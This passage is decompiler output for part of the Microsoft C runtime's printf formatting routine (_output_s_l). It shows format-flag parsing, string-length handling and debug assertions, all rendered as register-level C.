                            																			if( *__ecx == 0x78) {
                            																				goto L65;
                            																			}
                            																			L64:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc));
                            																			__eflags = __ecx - 0x58;
                            																			if(__ecx != 0x58) {
                            																				 *(__ebp - 0x25c) = 0;
                            																				goto L18;
                            																			}
                            																			goto L65;
                            																		}
                            																		L57:
                            																		__ecx =  *(__ebp + 0xc);
                            																		__edx =  *((char*)(__ecx + 1));
                            																		__eflags =  *((char*)(__ecx + 1)) - 0x32;
                            																		if( *((char*)(__ecx + 1)) != 0x32) {
                            																			goto L59;
                            																		} else {
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            																			 *(__ebp - 0x10) = __ecx;
                            																			goto L67;
                            																		}
                            																	}
                            																	L54:
                            																	__ecx =  *(__ebp + 0xc);
                            																	__edx =  *((char*)(__ecx + 1));
                            																	__eflags =  *((char*)(__ecx + 1)) - 0x34;
                            																	if( *((char*)(__ecx + 1)) != 0x34) {
                            																		goto L56;
                            																	} else {
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00008000;
                            																		 *(__ebp - 0x10) = __ecx;
                            																		goto L67;
                            																	}
                            																case 1:
                            																	L68:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																	goto L70;
                            																case 2:
                            																	L49:
                            																	__eax =  *(__ebp + 0xc);
                            																	__ecx =  *( *(__ebp + 0xc));
                            																	__eflags = __ecx - 0x6c;
                            																	if(__ecx != 0x6c) {
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00000010;
                            																		__eflags = __ecx;
                            																		 *(__ebp - 0x10) = __ecx;
                            																	} else {
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																	}
                            																	goto L70;
                            																case 3:
                            																	L69:
                            																	__eax =  *(__ebp - 0x10);
                            																	__eax =  *(__ebp - 0x10) | 0x00000800;
                            																	__eflags = __eax;
                            																	 *(__ebp - 0x10) = __eax;
                            																	goto L70;
                            																case 4:
                            																	goto L70;
                            															}
                            														case 7:
                            															L71:
                            															__ecx =  *((char*)(__ebp - 0x251));
                            															 *(__ebp - 0x324) = __ecx;
                            															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            															__eflags =  *(__ebp - 0x324) - 0x37;
                            															if( *(__ebp - 0x324) > 0x37) {
                            																while(1) {
                            																	L190:
                            																	__eflags =  *(_t701 - 0x28);
                            																	if( *(_t701 - 0x28) != 0) {
                            																		goto L216;
                            																	}
                            																	goto L191;
                            																}
                            															}
                            															L72:
                            															_t157 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            															__ecx =  *_t157 & 0x000000ff;
                            															switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            																case 0:
                            																	L123:
                            																	 *(__ebp - 0x2c) = 1;
                            																	__ecx =  *((char*)(__ebp - 0x251));
                            																	__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            																	__eflags = __ecx;
                            																	 *((char*)(__ebp - 0x251)) = __cl;
                            																	goto L124;
                            																case 1:
                            																	L73:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																		__eax =  *(__ebp - 0x10);
                            																		__eax =  *(__ebp - 0x10) | 0x00000800;
                            																		__eflags = __eax;
                            																		 *(__ebp - 0x10) = __eax;
                            																	}
                            																	goto L75;
                            																case 2:
                            																	L88:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00000800;
                            																		__eflags = __ecx;
                            																		 *(__ebp - 0x10) = __ecx;
                            																	}
                            																	goto L90;
                            																case 3:
                            																	L147:
                            																	 *(__ebp - 0x260) = 7;
                            																	goto L149;
                            																case 4:
                            																	L81:
                            																	__eax = __ebp + 0x14;
                            																	 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x288);
                            																	if( *(__ebp - 0x288) == 0) {
                            																		L83:
                            																		__edx =  *0x60b4f0; // 0x407424
                            																		 *(__ebp - 4) = __edx;
                            																		__eax =  *(__ebp - 4);
                            																		 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																		L87:
                            																		goto L190;
                            																	}
                            																	L82:
                            																	__ecx =  *(__ebp - 0x288);
                            																	__eflags =  *(__ecx + 4);
                            																	if( *(__ecx + 4) != 0) {
                            																		L84:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																		if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																			 *(__ebp - 0xc) = 0;
                            																			__edx =  *(__ebp - 0x288);
                            																			__eax =  *(__edx + 4);
                            																			 *(__ebp - 4) =  *(__edx + 4);
                            																			__ecx =  *(__ebp - 0x288);
                            																			__edx =  *__ecx;
                            																			 *(__ebp - 0x24) =  *__ecx;
                            																		} else {
                            																			__edx =  *(__ebp - 0x288);
                            																			__eax =  *(__edx + 4);
                            																			 *(__ebp - 4) =  *(__edx + 4);
                            																			__ecx =  *(__ebp - 0x288);
                            																			__eax =  *__ecx;
                            																			asm("cdq");
                            																			 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																			 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																			 *(__ebp - 0xc) = 1;
                            																		}
                            																		goto L87;
                            																	}
                            																	goto L83;
                            																case 5:
                            																	L124:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	__eax = __ebp - 0x248;
                            																	 *(__ebp - 4) = __ebp - 0x248;
                            																	 *(__ebp - 0x44) = 0x200;
                            																	__eflags =  *(__ebp - 0x30);
                            																	if( *(__ebp - 0x30) >= 0) {
                            																		L126:
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) != 0) {
                            																			L129:
                            																			__eflags =  *(__ebp - 0x30) - 0x200;
                            																			if( *(__ebp - 0x30) > 0x200) {
                            																				 *(__ebp - 0x30) = 0x200;
                            																			}
                            																			L131:
                            																			__eflags =  *(__ebp - 0x30) - 0xa3;
                            																			if( *(__ebp - 0x30) > 0xa3) {
                            																				 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																				 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																				__eflags =  *(__ebp - 0x20);
                            																				if( *(__ebp - 0x20) == 0) {
                            																					 *(__ebp - 0x30) = 0xa3;
                            																				} else {
                            																					__eax =  *(__ebp - 0x20);
                            																					 *(__ebp - 4) =  *(__ebp - 0x20);
                            																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																					 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																				}
                            																			}
                            																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																			__eax =  *(__ebp + 0x14);
                            																			__ecx =  *(__eax - 8);
                            																			__edx =  *(__eax - 4);
                            																			 *(__ebp - 0x2a8) =  *(__eax - 8);
                            																			 *(__ebp - 0x2a4) =  *(__eax - 4);
                            																			__ecx = __ebp - 0x40;
                            																			_push(E0040D3B0(__ebp - 0x40));
                            																			__eax =  *(__ebp - 0x2c);
                            																			_push( *(__ebp - 0x2c));
                            																			__ecx =  *(__ebp - 0x30);
                            																			_push( *(__ebp - 0x30));
                            																			__edx =  *((char*)(__ebp - 0x251));
                            																			_push( *((char*)(__ebp - 0x251)));
                            																			__eax =  *(__ebp - 0x44);
                            																			_push( *(__ebp - 0x44));
                            																			__ecx =  *(__ebp - 4);
                            																			_push( *(__ebp - 4));
                            																			__edx = __ebp - 0x2a8;
                            																			_push(__ebp - 0x2a8);
                            																			__eax =  *0x60b3cc; // 0x7e8c4bdb
                            																			__eax =  *__eax();
                            																			__esp = __esp + 0x1c;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				__eflags =  *(__ebp - 0x30);
                            																				if( *(__ebp - 0x30) == 0) {
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__edx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																					__eax =  *__eax();
                            																					__esp = __esp + 8;
                            																				}
                            																			}
                            																			__ecx =  *((char*)(__ebp - 0x251));
                            																			__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
                            																			if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																				if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__eax =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																					E00410200(__ecx) =  *__eax();
                            																					__esp = __esp + 8;
                            																				}
                            																			}
                            																			__edx =  *(__ebp - 4);
                            																			__eax =  *( *(__ebp - 4));
                            																			__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																			if( *( *(__ebp - 4)) == 0x2d) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																				__edx =  *(__ebp - 4);
                            																				__edx =  *(__ebp - 4) + 1;
                            																				__eflags = __edx;
                            																				 *(__ebp - 4) = __edx;
                            																			}
                            																			__eax =  *(__ebp - 4);
                            																			 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																			do {
                            																				L190:
                            																				__eflags =  *(_t701 - 0x28);
                            																				if( *(_t701 - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			} while ( *(__ebp - 0x324) > 0x37);
                            																			goto L72;
                            																		}
                            																		L127:
                            																		__ecx =  *((char*)(__ebp - 0x251));
                            																		__eflags = __ecx - 0x67;
                            																		if(__ecx != 0x67) {
                            																			goto L129;
                            																		}
                            																		L128:
                            																		 *(__ebp - 0x30) = 1;
                            																		goto L131;
                            																	}
                            																	L125:
                            																	 *(__ebp - 0x30) = 6;
                            																	goto L131;
                            																case 6:
                            																	L75:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																		__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																		 *(__ebp - 0x284) = __ax;
                            																		__cl =  *(__ebp - 0x284);
                            																		 *(__ebp - 0x248) = __cl;
                            																		 *(__ebp - 0x24) = 1;
                            																	} else {
                            																		 *(__ebp - 0x280) = 0;
                            																		__edx = __ebp + 0x14;
                            																		__eax = E0041C2D0(__ebp + 0x14);
                            																		 *(__ebp - 0x258) = __ax;
                            																		__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            																		__ecx = __ebp - 0x248;
                            																		__edx = __ebp - 0x24;
                            																		 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            																		__eflags =  *(__ebp - 0x280);
                            																		if( *(__ebp - 0x280) != 0) {
                            																			 *(__ebp - 0x28) = 1;
                            																		}
                            																	}
                            																	__edx = __ebp - 0x248;
                            																	 *(__ebp - 4) = __ebp - 0x248;
                            																	while(1) {
                            																		L190:
                            																		__eflags =  *(_t701 - 0x28);
                            																		if( *(_t701 - 0x28) != 0) {
                            																			goto L216;
                            																		}
                            																		goto L191;
                            																	}
                            																case 7:
                            																	L144:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
                            																	L153:
                            																	__eflags =  *(_t701 - 0x10) & 0x00008000;
                            																	if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            																		_t649 =  *(_t701 - 0x10) & 0x00001000;
                            																		__eflags = _t649;
                            																		if(_t649 == 0) {
                            																			__eflags =  *(_t701 - 0x10) & 0x00000020;
                            																			if(( *(_t701 - 0x10) & 0x00000020) == 0) {
                            																				_t651 =  *(_t701 - 0x10) & 0x00000040;
                            																				__eflags = _t651;
                            																				if(_t651 == 0) {
                            																					_t496 = E0041C290(_t701 + 0x14);
                            																					_t703 = _t703 + 4;
                            																					__eflags = 0;
                            																					 *(_t701 - 0x2b8) = _t496;
                            																					 *(_t701 - 0x2b4) = 0;
                            																				} else {
                            																					_t580 = E0041C290(_t701 + 0x14);
                            																					_t703 = _t703 + 4;
                            																					asm("cdq");
                            																					 *(_t701 - 0x2b8) = _t580;
                            																					 *(_t701 - 0x2b4) = _t651;
                            																				}
                            																			} else {
                            																				_t698 =  *(_t701 - 0x10) & 0x00000040;
                            																				__eflags = _t698;
                            																				if(_t698 == 0) {
                            																					_t581 = E0041C290(_t701 + 0x14);
                            																					_t703 = _t703 + 4;
                            																					asm("cdq");
                            																					 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
                            																					 *(_t701 - 0x2b4) = _t698;
                            																				} else {
                            																					_t584 = E0041C290(_t701 + 0x14);
                            																					_t703 = _t703 + 4;
                            																					asm("cdq");
                            																					 *(_t701 - 0x2b8) = _t584;
                            																					 *(_t701 - 0x2b4) = _t698;
                            																				}
                            																			}
                            																		} else {
                            																			_t587 = E0041C2B0(_t701 + 0x14);
                            																			_t703 = _t703 + 4;
                            																			 *(_t701 - 0x2b8) = _t587;
                            																			 *(_t701 - 0x2b4) = _t649;
                            																		}
                            																	} else {
                            																		_t588 = E0041C2B0(_t701 + 0x14);
                            																		_t703 = _t703 + 4;
                            																		 *(_t701 - 0x2b8) = _t588;
                            																		 *(_t701 - 0x2b4) = _t647;
                            																	}
                            																	__eflags =  *(_t701 - 0x10) & 0x00000040;
                            																	if(( *(_t701 - 0x10) & 0x00000040) == 0) {
                            																		goto L170;
                            																	}
                            																case 8:
                            																	L109:
                            																	__ecx = __ebp + 0x14;
                            																	 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            																	__eax = E00420F80();
                            																	__eflags = __eax;
                            																	if(__eax != 0) {
                            																		L119:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																			__edx =  *(__ebp - 0x298);
                            																			__eax =  *(__ebp - 0x24c);
                            																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																		} else {
                            																			__eax =  *(__ebp - 0x298);
                            																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																		}
                            																		 *(__ebp - 0x28) = 1;
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(_t701 - 0x28);
                            																			if( *(_t701 - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																	}
                            																	L110:
                            																	__edx = 0;
                            																	__eflags = 0;
                            																	if(0 == 0) {
                            																		 *(__ebp - 0x32c) = 0;
                            																	} else {
                            																		 *(__ebp - 0x32c) = 1;
                            																	}
                            																	__eax =  *(__ebp - 0x32c);
                            																	 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            																	__eflags =  *(__ebp - 0x29c);
                            																	if( *(__ebp - 0x29c) == 0) {
                            																		_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																		_push(0);
                            																		_push(0x695);
                            																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																		_push(2);
                            																		__eax = L0040E1A0();
                            																		__esp = __esp + 0x14;
                            																		__eflags = __eax - 1;
                            																		if(__eax == 1) {
                            																			asm("int3");
                            																		}
                            																	}
                            																	__eflags =  *(__ebp - 0x29c);
                            																	if( *(__ebp - 0x29c) != 0) {
                            																		L118:
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(_t701 - 0x28);
                            																			if( *(_t701 - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																	} else {
                            																		L117:
                            																		 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																		__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																		 *(__ebp - 0x2f8) = 0xffffffff;
                            																		__ecx = __ebp - 0x40;
                            																		__eax = E0040D380(__ecx);
                            																		__eax =  *(__ebp - 0x2f8);
                            																		goto L229;
                            																	}
                            																case 9:
                            																	goto L0;
                            																case 0xa:
                            																	L146:
                            																	 *(__ebp - 0x30) = 8;
                            																	goto L147;
                            																case 0xb:
                            																	L90:
                            																	__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																	if( *(__ebp - 0x30) != 0xffffffff) {
                            																		__edx =  *(__ebp - 0x30);
                            																		 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            																	} else {
                            																		 *(__ebp - 0x328) = 0x7fffffff;
                            																	}
                            																	__eax =  *(__ebp - 0x328);
                            																	 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            																	__ecx = __ebp + 0x14;
                            																	 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																		L101:
                            																		__eflags =  *(__ebp - 4);
                            																		if( *(__ebp - 4) == 0) {
                            																			__edx =  *0x60b4f0; // 0x407424
                            																			 *(__ebp - 4) = __edx;
                            																		}
                            																		__eax =  *(__ebp - 4);
                            																		 *(__ebp - 0x28c) =  *(__ebp - 4);
                            																		while(1) {
                            																			L104:
                            																			__ecx =  *(__ebp - 0x290);
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																			__eflags = __ecx;
                            																			if(__ecx == 0) {
                            																				break;
                            																			}
                            																			L105:
                            																			__eax =  *(__ebp - 0x28c);
                            																			__ecx =  *( *(__ebp - 0x28c));
                            																			__eflags = __ecx;
                            																			if(__ecx == 0) {
                            																				break;
                            																			}
                            																			L106:
                            																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																		}
                            																		L107:
                            																		__eax =  *(__ebp - 0x28c);
                            																		__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																		__eflags = __eax;
                            																		 *(__ebp - 0x24) = __eax;
                            																		goto L108;
                            																	} else {
                            																		L94:
                            																		__eflags =  *(__ebp - 4);
                            																		if( *(__ebp - 4) == 0) {
                            																			__eax =  *0x60b4f4; // 0x407414
                            																			 *(__ebp - 4) = __eax;
                            																		}
                            																		 *(__ebp - 0xc) = 1;
                            																		__ecx =  *(__ebp - 4);
                            																		 *(__ebp - 0x294) =  *(__ebp - 4);
                            																		while(1) {
                            																			L97:
                            																			__edx =  *(__ebp - 0x290);
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																			__eflags =  *(__ebp - 0x290);
                            																			if( *(__ebp - 0x290) == 0) {
                            																				break;
                            																			}
                            																			L98:
                            																			__ecx =  *(__ebp - 0x294);
                            																			__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																			__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																			if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																				break;
                            																			}
                            																			L99:
                            																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																		}
                            																		L100:
                            																		 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            																		__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            																		 *(__ebp - 0x24) = __ecx;
                            																		L108:
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(_t701 - 0x28);
                            																			if( *(_t701 - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																	}
                            																case 0xc:
                            																	L145:
                            																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
                            																	while(1) {
                            																		L153:
                            																		__eflags =  *(_t701 - 0x10) & 0x00008000;
                            																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            																			_t649 =  *(_t701 - 0x10) & 0x00001000;
                            																			__eflags = _t649;
                            																			if(_t649 == 0) {
                            																				__eflags =  *(_t701 - 0x10) & 0x00000020;
                            																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
                            																					_t651 =  *(_t701 - 0x10) & 0x00000040;
                            																					__eflags = _t651;
                            																					if(_t651 == 0) {
                            																						_t496 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						__eflags = 0;
                            																						 *(_t701 - 0x2b8) = _t496;
                            																						 *(_t701 - 0x2b4) = 0;
                            																					} else {
                            																						_t580 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t580;
                            																						 *(_t701 - 0x2b4) = _t651;
                            																					}
                            																				} else {
                            																					_t698 =  *(_t701 - 0x10) & 0x00000040;
                            																					__eflags = _t698;
                            																					if(_t698 == 0) {
                            																						_t581 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
                            																						 *(_t701 - 0x2b4) = _t698;
                            																					} else {
                            																						_t584 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t584;
                            																						 *(_t701 - 0x2b4) = _t698;
                            																					}
                            																				}
                            																			} else {
                            																				_t587 = E0041C2B0(_t701 + 0x14);
                            																				_t703 = _t703 + 4;
                            																				 *(_t701 - 0x2b8) = _t587;
                            																				 *(_t701 - 0x2b4) = _t649;
                            																			}
                            																		} else {
                            																			_t588 = E0041C2B0(_t701 + 0x14);
                            																			_t703 = _t703 + 4;
                            																			 *(_t701 - 0x2b8) = _t588;
                            																			 *(_t701 - 0x2b4) = _t647;
                            																		}
                            																		__eflags =  *(_t701 - 0x10) & 0x00000040;
                            																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
                            																			goto L170;
                            																		}
                            																		goto L166;
                            																	}
                            																case 0xd:
                            																	L148:
                            																	 *(__ebp - 0x260) = 0x27;
                            																	L149:
                            																	 *((intOrPtr*)(__ebp - 8)) = 0x10;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																	if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																		 *((char*)(__ebp - 0x14)) = 0x30;
                            																		 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            																		__eflags =  *(__ebp - 0x260) + 0x51;
                            																		 *((char*)(__ebp - 0x13)) = __al;
                            																		 *(__ebp - 0x1c) = 2;
                            																	}
                            																	while(1) {
                            																		L153:
                            																		__eflags =  *(_t701 - 0x10) & 0x00008000;
                            																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            																			_t649 =  *(_t701 - 0x10) & 0x00001000;
                            																			__eflags = _t649;
                            																			if(_t649 == 0) {
                            																				__eflags =  *(_t701 - 0x10) & 0x00000020;
                            																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
                            																					_t651 =  *(_t701 - 0x10) & 0x00000040;
                            																					__eflags = _t651;
                            																					if(_t651 == 0) {
                            																						_t496 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						__eflags = 0;
                            																						 *(_t701 - 0x2b8) = _t496;
                            																						 *(_t701 - 0x2b4) = 0;
                            																					} else {
                            																						_t580 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t580;
                            																						 *(_t701 - 0x2b4) = _t651;
                            																					}
                            																				} else {
                            																					_t698 =  *(_t701 - 0x10) & 0x00000040;
                            																					__eflags = _t698;
                            																					if(_t698 == 0) {
                            																						_t581 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
                            																						 *(_t701 - 0x2b4) = _t698;
                            																					} else {
                            																						_t584 = E0041C290(_t701 + 0x14);
                            																						_t703 = _t703 + 4;
                            																						asm("cdq");
                            																						 *(_t701 - 0x2b8) = _t584;
                            																						 *(_t701 - 0x2b4) = _t698;
                            																					}
                            																				}
                            																			} else {
                            																				_t587 = E0041C2B0(_t701 + 0x14);
                            																				_t703 = _t703 + 4;
                            																				 *(_t701 - 0x2b8) = _t587;
                            																				 *(_t701 - 0x2b4) = _t649;
                            																			}
                            																		} else {
                            																			_t588 = E0041C2B0(_t701 + 0x14);
                            																			_t703 = _t703 + 4;
                            																			 *(_t701 - 0x2b8) = _t588;
                            																			 *(_t701 - 0x2b4) = _t647;
                            																		}
                            																		__eflags =  *(_t701 - 0x10) & 0x00000040;
                            																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
                            																			goto L170;
                            																		}
                            																		goto L166;
                            																	}
                            																case 0xe:
                            																	while(1) {
                            																		L190:
                            																		__eflags =  *(_t701 - 0x28);
                            																		if( *(_t701 - 0x28) != 0) {
                            																			goto L216;
                            																		}
                            																		goto L191;
                            																	}
                            															}
                            														case 8:
                            															L30:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            															goto L33;
                            														case 9:
                            															L31:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            															goto L33;
                            														case 0xa:
                            															L29:
                            															__ecx =  *(__ebp - 0x10);
                            															__ecx =  *(__ebp - 0x10) | 0x00000001;
                            															 *(__ebp - 0x10) = __ecx;
                            															goto L33;
                            														case 0xb:
                            															L28:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            															goto L33;
                            														case 0xc:
                            															L32:
                            															__ecx =  *(__ebp - 0x10);
                            															__ecx =  *(__ebp - 0x10) | 0x00000008;
                            															__eflags = __ecx;
                            															 *(__ebp - 0x10) = __ecx;
                            															goto L33;
                            														case 0xd:
                            															L33:
                            															goto L218;
                            													}
                            												} else {
                            													if(0 == 0) {
                            														 *(_t701 - 0x314) = 0;
                            													} else {
                            														 *(_t701 - 0x314) = 1;
                            													}
                            													_t618 =  *(_t701 - 0x314);
                            													 *(_t701 - 0x278) =  *(_t701 - 0x314);
                            													if( *(_t701 - 0x278) == 0) {
                            														_push(L"(\"Incorrect format specifier\", 0)");
                            														_push(0);
                            														_push(0x460);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														_t545 = L0040E1A0();
                            														_t703 = _t703 + 0x14;
                            														if(_t545 == 1) {
                            															asm("int3");
                            														}
                            													}
                            													L14:
                            													if( *(_t701 - 0x278) != 0) {
                            														goto L16;
                            													} else {
                            														 *((intOrPtr*)(L0040EC70(_t618))) = 0x16;
                            														E00411A50(_t589, _t618, _t699, _t700, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            														 *(_t701 - 0x2f0) = 0xffffffff;
                            														E0040D380(_t701 - 0x40);
                            														_t518 =  *(_t701 - 0x2f0);
                            														L229:
